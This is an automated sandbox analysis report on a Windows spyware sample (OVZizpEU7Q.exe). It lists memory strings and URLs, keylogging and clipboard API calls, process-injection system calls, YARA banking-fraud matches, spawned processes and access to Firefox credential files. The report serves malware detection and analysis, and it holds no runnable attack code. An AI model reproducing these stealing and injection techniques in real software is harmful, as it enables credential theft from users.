                Source: CkszoACLEZHP.exe, 00000006.00000002.4761022194.00000000042A4000.00000004.80000000.00040000.00000000.sdmp, choice.exe, 00000007.00000002.4758770775.0000000005964000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2974919295.0000000029F34000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://whois.gandi.net/en/results?search=sunnyz.store
                Source: choice.exe, 00000007.00000002.4758770775.0000000006918000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.dymar.shop
                Source: CkszoACLEZHP.exe, 00000006.00000002.4761022194.0000000005258000.00000004.80000000.00040000.00000000.sdmp, choice.exe, 00000007.00000002.4758770775.0000000006918000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.dymar.shop/
                Source: CkszoACLEZHP.exe, 00000006.00000002.4761022194.0000000005258000.00000004.80000000.00040000.00000000.sdmp, choice.exe, 00000007.00000002.4758770775.0000000006918000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.dymar.shop/image/cache/catalog/DYMAR%20250-300x300.jpg
                Source: CkszoACLEZHP.exe, 00000006.00000002.4761022194.0000000005258000.00000004.80000000.00040000.00000000.sdmp, choice.exe, 00000007.00000002.4758770775.0000000006918000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.dymar.shop/image/catalog/DYMAR
                Source: CkszoACLEZHP.exe, 00000006.00000002.4761022194.0000000005258000.00000004.80000000.00040000.00000000.sdmp, choice.exe, 00000007.00000002.4758770775.0000000006918000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.dymar.shop/image/catalog/favicon.png
                Source: choice.exe, 00000007.00000002.4758770775.0000000006918000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.dymar.shop/index.php?route=account/account
                Source: CkszoACLEZHP.exe, 00000006.00000002.4761022194.0000000005258000.00000004.80000000.00040000.00000000.sdmp, choice.exe, 00000007.00000002.4758770775.0000000006918000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.dymar.shop/index.php?route=account/login
                Source: CkszoACLEZHP.exe, 00000006.00000002.4761022194.0000000005258000.00000004.80000000.00040000.00000000.sdmp, choice.exe, 00000007.00000002.4758770775.0000000006918000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.dymar.shop/index.php?route=account/newsletter
                Source: CkszoACLEZHP.exe, 00000006.00000002.4761022194.0000000005258000.00000004.80000000.00040000.00000000.sdmp, choice.exe, 00000007.00000002.4758770775.0000000006918000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.dymar.shop/index.php?route=account/order
                Source: CkszoACLEZHP.exe, 00000006.00000002.4761022194.0000000005258000.00000004.80000000.00040000.00000000.sdmp, choice.exe, 00000007.00000002.4758770775.0000000006918000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.dymar.shop/index.php?route=account/register
                Source: CkszoACLEZHP.exe, 00000006.00000002.4761022194.0000000005258000.00000004.80000000.00040000.00000000.sdmp, choice.exe, 00000007.00000002.4758770775.0000000006918000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.dymar.shop/index.php?route=account/return/add
                Source: CkszoACLEZHP.exe, 00000006.00000002.4761022194.0000000005258000.00000004.80000000.00040000.00000000.sdmp, choice.exe, 00000007.00000002.4758770775.0000000006918000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.dymar.shop/index.php?route=account/voucher
                Source: choice.exe, 00000007.00000002.4758770775.0000000006918000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.dymar.shop/index.php?route=account/wishlist
                Source: CkszoACLEZHP.exe, 00000006.00000002.4761022194.0000000005258000.00000004.80000000.00040000.00000000.sdmp, choice.exe, 00000007.00000002.4758770775.0000000006918000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.dymar.shop/index.php?route=affiliate/login
                Source: CkszoACLEZHP.exe, 00000006.00000002.4761022194.0000000005258000.00000004.80000000.00040000.00000000.sdmp, choice.exe, 00000007.00000002.4758770775.0000000006918000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.dymar.shop/index.php?route=common/currency/currency
                Source: CkszoACLEZHP.exe, 00000006.00000002.4761022194.0000000005258000.00000004.80000000.00040000.00000000.sdmp, choice.exe, 00000007.00000002.4758770775.0000000006918000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.dymar.shop/index.php?route=common/language/language
                Source: choice.exe, 00000007.00000002.4758770775.0000000006918000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.dymar.shop/index.php?route=error/not_found&amp;bbg=xricoPUhMXLl8f28VT4xzhY6t4bZSB0G1
                Source: choice.exe, 00000007.00000002.4758770775.0000000006918000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.dymar.shop/index.php?route=information/contact
                Source: CkszoACLEZHP.exe, 00000006.00000002.4761022194.0000000005258000.00000004.80000000.00040000.00000000.sdmp, choice.exe, 00000007.00000002.4758770775.0000000006918000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.dymar.shop/index.php?route=information/sitemap
                Source: CkszoACLEZHP.exe, 00000006.00000002.4761022194.0000000005258000.00000004.80000000.00040000.00000000.sdmp, choice.exe, 00000007.00000002.4758770775.0000000006918000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.dymar.shop/index.php?route=product/compare
                Source: CkszoACLEZHP.exe, 00000006.00000002.4761022194.0000000005258000.00000004.80000000.00040000.00000000.sdmp, choice.exe, 00000007.00000002.4758770775.0000000006918000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.dymar.shop/index.php?route=product/manufacturer
                Source: CkszoACLEZHP.exe, 00000006.00000002.4761022194.0000000005258000.00000004.80000000.00040000.00000000.sdmp, choice.exe, 00000007.00000002.4758770775.0000000006918000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.dymar.shop/index.php?route=product/special
                Source: CkszoACLEZHP.exe, 00000006.00000002.4761022194.0000000005258000.00000004.80000000.00040000.00000000.sdmp, choice.exe, 00000007.00000002.4758770775.0000000006918000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.dymar.shop/informaciya-o-dostavke
                Source: CkszoACLEZHP.exe, 00000006.00000002.4761022194.0000000005258000.00000004.80000000.00040000.00000000.sdmp, choice.exe, 00000007.00000002.4758770775.0000000006918000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.dymar.shop/o-nas
                Source: CkszoACLEZHP.exe, 00000006.00000002.4761022194.0000000005258000.00000004.80000000.00040000.00000000.sdmp, choice.exe, 00000007.00000002.4758770775.0000000006918000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.dymar.shop/politika-bezopasnosti
                Source: CkszoACLEZHP.exe, 00000006.00000002.4761022194.0000000005258000.00000004.80000000.00040000.00000000.sdmp, choice.exe, 00000007.00000002.4758770775.0000000006918000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.dymar.shop/usloviya-soglasheniya
                Source: choice.exe, 00000007.00000003.2868947216.00000000080B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: CkszoACLEZHP.exe, 00000006.00000002.4761022194.00000000042A4000.00000004.80000000.00040000.00000000.sdmp, choice.exe, 00000007.00000002.4758770775.0000000005964000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2974919295.0000000029F34000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.gandi.net/en/domain
                Source: choice.exe, 00000007.00000003.2868947216.00000000080B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: CkszoACLEZHP.exe, 00000006.00000002.4761022194.0000000005258000.00000004.80000000.00040000.00000000.sdmp, choice.exe, 00000007.00000002.4758770775.0000000006918000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com/gtag/js?id=G-0V86MNJQXC
                Source: CkszoACLEZHP.exe, 00000006.00000002.4761022194.0000000004DA2000.00000004.80000000.00040000.00000000.sdmp, choice.exe, 00000007.00000002.4758770775.0000000006462000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.ukraine.com.ua/$
                Source: CkszoACLEZHP.exe, 00000006.00000002.4761022194.0000000004DA2000.00000004.80000000.00040000.00000000.sdmp, choice.exe, 00000007.00000002.4758770775.0000000006462000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.ukraine.com.ua/wiki/hosting/errors/site-not-served/
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: 0_2_00474164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00474164
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: 0_2_00473F66 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00473F66
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: 0_2_0046001C GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_0046001C
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: 0_2_0048CABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_0048CABC

                E-Banking Fraud

                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000007.00000002.4758299557.0000000004D60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.4758261090.0000000004D10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.4762982458.00000000062F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2689551851.0000000006FA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.4757299419.0000000003090000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2685415495.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2686604210.00000000049E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.4758462130.0000000002DD0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

                System Summary

                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: This is a third-party compiled AutoIt script.0_2_00403B3A
                Source: OVZizpEU7Q.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                Source: OVZizpEU7Q.exe, 00000000.00000000.2283868731.00000000004B4000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_1ef33abd-c
                Source: OVZizpEU7Q.exe, 00000000.00000000.2283868731.00000000004B4000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_b3a31f46-9
                Source: OVZizpEU7Q.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_a78d0ca2-1
                Source: OVZizpEU7Q.exe String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_43beca66-a
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0042CBC3 NtClose,2_2_0042CBC3
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C72B60 NtClose,LdrInitializeThunk,2_2_03C72B60
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C72DF0 NtQuerySystemInformation,LdrInitializeThunk,2_2_03C72DF0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C72C70 NtFreeVirtualMemory,LdrInitializeThunk,2_2_03C72C70
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C735C0 NtCreateMutant,LdrInitializeThunk,2_2_03C735C0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C74340 NtSetContextThread,2_2_03C74340
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C74650 NtSuspendThread,2_2_03C74650
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C72BE0 NtQueryValueKey,2_2_03C72BE0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C72BF0 NtAllocateVirtualMemory,2_2_03C72BF0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C72B80 NtQueryInformationFile,2_2_03C72B80
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C72BA0 NtEnumerateValueKey,2_2_03C72BA0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C72AD0 NtReadFile,2_2_03C72AD0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C72AF0 NtWriteFile,2_2_03C72AF0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C72AB0 NtWaitForSingleObject,2_2_03C72AB0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C72FE0 NtCreateFile,2_2_03C72FE0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C72F90 NtProtectVirtualMemory,2_2_03C72F90
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C72FA0 NtQuerySection,2_2_03C72FA0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C72FB0 NtResumeThread,2_2_03C72FB0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C72F60 NtCreateProcessEx,2_2_03C72F60
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C72F30 NtCreateSection,2_2_03C72F30
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C72EE0 NtQueueApcThread,2_2_03C72EE0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C72E80 NtReadVirtualMemory,2_2_03C72E80
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C72EA0 NtAdjustPrivilegesToken,2_2_03C72EA0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C72E30 NtWriteVirtualMemory,2_2_03C72E30
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C72DD0 NtDelayExecution,2_2_03C72DD0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C72DB0 NtEnumerateKey,2_2_03C72DB0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C72D00 NtSetInformationFile,2_2_03C72D00
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C72D10 NtMapViewOfSection,2_2_03C72D10
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C72D30 NtUnmapViewOfSection,2_2_03C72D30
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C72CC0 NtQueryVirtualMemory,2_2_03C72CC0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C72CF0 NtOpenProcess,2_2_03C72CF0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C72CA0 NtQueryInformationToken,2_2_03C72CA0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C72C60 NtCreateKey,2_2_03C72C60
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C72C00 NtQueryInformationProcess,2_2_03C72C00
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C73090 NtSetValueKey,2_2_03C73090
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C73010 NtOpenDirectoryObject,2_2_03C73010
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C739B0 NtGetContextThread,2_2_03C739B0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C73D70 NtOpenThread,2_2_03C73D70
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C73D10 NtOpenProcessToken,2_2_03C73D10
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exe Code function: 0_2_0046A1EF: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,0_2_0046A1EF
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exe Code function: 0_2_00458310 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00458310
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exe Code function: 0_2_004651BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_004651BD
                Source: OVZizpEU7Q.exe, 00000000.00000003.2295608545.0000000004CED000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs OVZizpEU7Q.exe
                Source: OVZizpEU7Q.exe, 00000000.00000003.2295274296.0000000004313000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs OVZizpEU7Q.exe
                Source: OVZizpEU7Q.exe, 00000000.00000003.2286521331.0000000003EC0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamearmsvc.exeN vs OVZizpEU7Q.exe
                Source: OVZizpEU7Q.exe, 00000000.00000003.2297462182.0000000004200000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameALG.exej% vs OVZizpEU7Q.exe
                Source: OVZizpEU7Q.exe Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: OVZizpEU7Q.exe Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: armsvc.exe.0.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: alg.exe.0.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: classification engine Classification label: mal100.spre.troj.spyw.evad.winEXE@8/6@18/14
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exe Code function: 0_2_0046A06A GetLastError,FormatMessageW,0_2_0046A06A
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exe Code function: 0_2_004581CB AdjustTokenPrivileges,CloseHandle,0_2_004581CB
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exe Code function: 0_2_004587E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_004587E1
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exe Code function: 0_2_0046B333 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_0046B333
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exe Code function: 0_2_0047EE0D CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_0047EE0D
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exe Code function: 0_2_0046C397 CoInitialize,CoCreateInstance,CoUninitialize,0_2_0046C397
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exe Code function: 0_2_00404E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_00404E89
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exe Code function: 0_2_00AECBD0 StrStrIW,CloseHandle,StrStrIW,CloseServiceHandle,OpenServiceW,StrStrIW,_wcslen,ChangeServiceConfigW,StrStrIW,StrStrIW,CloseServiceHandle,CloseHandle,StartServiceW,0_2_00AECBD0
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exe File created: C:\Users\user\AppData\Roaming\dfc48433435cc549.bin
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\Multiarch.m0yv-dfc48433435cc549-inf
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\Multiarch.m0yv-dfc48433435cc54973779169-b
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exe File created: C:\Users\user\AppData\Local\Temp\autDAA9.tmp
                Source: C:\Program Files\Mozilla Firefox\firefox.exe File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: choice.exe, 00000007.00000003.2866854699.00000000032C2000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 00000007.00000003.2866675348.000000000329F000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 00000007.00000003.2864440863.0000000003295000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 00000007.00000003.2866854699.0000000003295000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 00000007.00000003.2864340358.0000000003274000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 00000007.00000002.4757471775.0000000003295000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 00000007.00000002.4757471775.00000000032C2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: OVZizpEU7Q.exe Virustotal: Detection: 73%
                Source: OVZizpEU7Q.exe ReversingLabs: Detection: 86%
                Source: unknown Process created: C:\Users\user\Desktop\OVZizpEU7Q.exe "C:\Users\user\Desktop\OVZizpEU7Q.exe"
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exe Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\OVZizpEU7Q.exe"
                Source: unknown Process created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe"
                Source: C:\Program Files (x86)\mWabryfHuuCavSeCcAMyWYDKsSjRFhyetIEsnxYJModQvIrcppfYRfKhyRcUrtWfVkYKpeFmGonTHuo\CkszoACLEZHP.exe Process created: C:\Windows\SysWOW64\choice.exe "C:\Windows\SysWOW64\choice.exe"
                Source: C:\Windows\SysWOW64\choice.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exe Section loaded: wsock32.dll
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exe Section loaded: version.dll
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exe Section loaded: winmm.dll
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exe Section loaded: mpr.dll
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exe Section loaded: wininet.dll
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exe Section loaded: iphlpapi.dll
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exe Section loaded: userenv.dll
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exe Section loaded: uxtheme.dll
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exe Section loaded: winhttp.dll
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exe Section loaded: secur32.dll
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exe Section loaded: sspicli.dll
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exe Section loaded: dnsapi.dll
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exe Section loaded: ntmarta.dll
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exe Section loaded: kernel.appcore.dll
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exe Section loaded: windows.storage.dll
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exe Section loaded: wldp.dll
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exe Section loaded: ondemandconnroutehelper.dll
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exe Section loaded: mswsock.dll
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exe Section loaded: winnsi.dll
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exe Section loaded: dhcpcsvc6.dll
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exe Section loaded: dhcpcsvc.dll
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exe Section loaded: webio.dll
                Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Section loaded: kernel.appcore.dll
                Source: C:\Program Files (x86)\mWabryfHuuCavSeCcAMyWYDKsSjRFhyetIEsnxYJModQvIrcppfYRfKhyRcUrtWfVkYKpeFmGonTHuo\CkszoACLEZHP.exe Section loaded: wininet.dll
                Source: C:\Program Files (x86)\mWabryfHuuCavSeCcAMyWYDKsSjRFhyetIEsnxYJModQvIrcppfYRfKhyRcUrtWfVkYKpeFmGonTHuo\CkszoACLEZHP.exe Section loaded: mswsock.dll
                Source: C:\Program Files (x86)\mWabryfHuuCavSeCcAMyWYDKsSjRFhyetIEsnxYJModQvIrcppfYRfKhyRcUrtWfVkYKpeFmGonTHuo\CkszoACLEZHP.exe Section loaded: dnsapi.dll
                Source: C:\Program Files (x86)\mWabryfHuuCavSeCcAMyWYDKsSjRFhyetIEsnxYJModQvIrcppfYRfKhyRcUrtWfVkYKpeFmGonTHuo\CkszoACLEZHP.exe Section loaded: iphlpapi.dll
                Source: C:\Program Files (x86)\mWabryfHuuCavSeCcAMyWYDKsSjRFhyetIEsnxYJModQvIrcppfYRfKhyRcUrtWfVkYKpeFmGonTHuo\CkszoACLEZHP.exe Section loaded: fwpuclnt.dll
                Source: C:\Program Files (x86)\mWabryfHuuCavSeCcAMyWYDKsSjRFhyetIEsnxYJModQvIrcppfYRfKhyRcUrtWfVkYKpeFmGonTHuo\CkszoACLEZHP.exe Section loaded: rasadhlp.dll
                Source: C:\Windows\SysWOW64\choice.exe Section loaded: version.dll
                Source: C:\Windows\SysWOW64\choice.exe Section loaded: wininet.dll
                Source: C:\Windows\SysWOW64\choice.exe Section loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\choice.exe Section loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\choice.exe Section loaded: ieframe.dll
                Source: C:\Windows\SysWOW64\choice.exe Section loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\choice.exe Section loaded: netapi32.dll
                Source: C:\Windows\SysWOW64\choice.exe Section loaded: userenv.dll
                Source: C:\Windows\SysWOW64\choice.exe Section loaded: winhttp.dll
                Source: C:\Windows\SysWOW64\choice.exe Section loaded: wkscli.dll
                Source: C:\Windows\SysWOW64\choice.exe Section loaded: netutils.dll
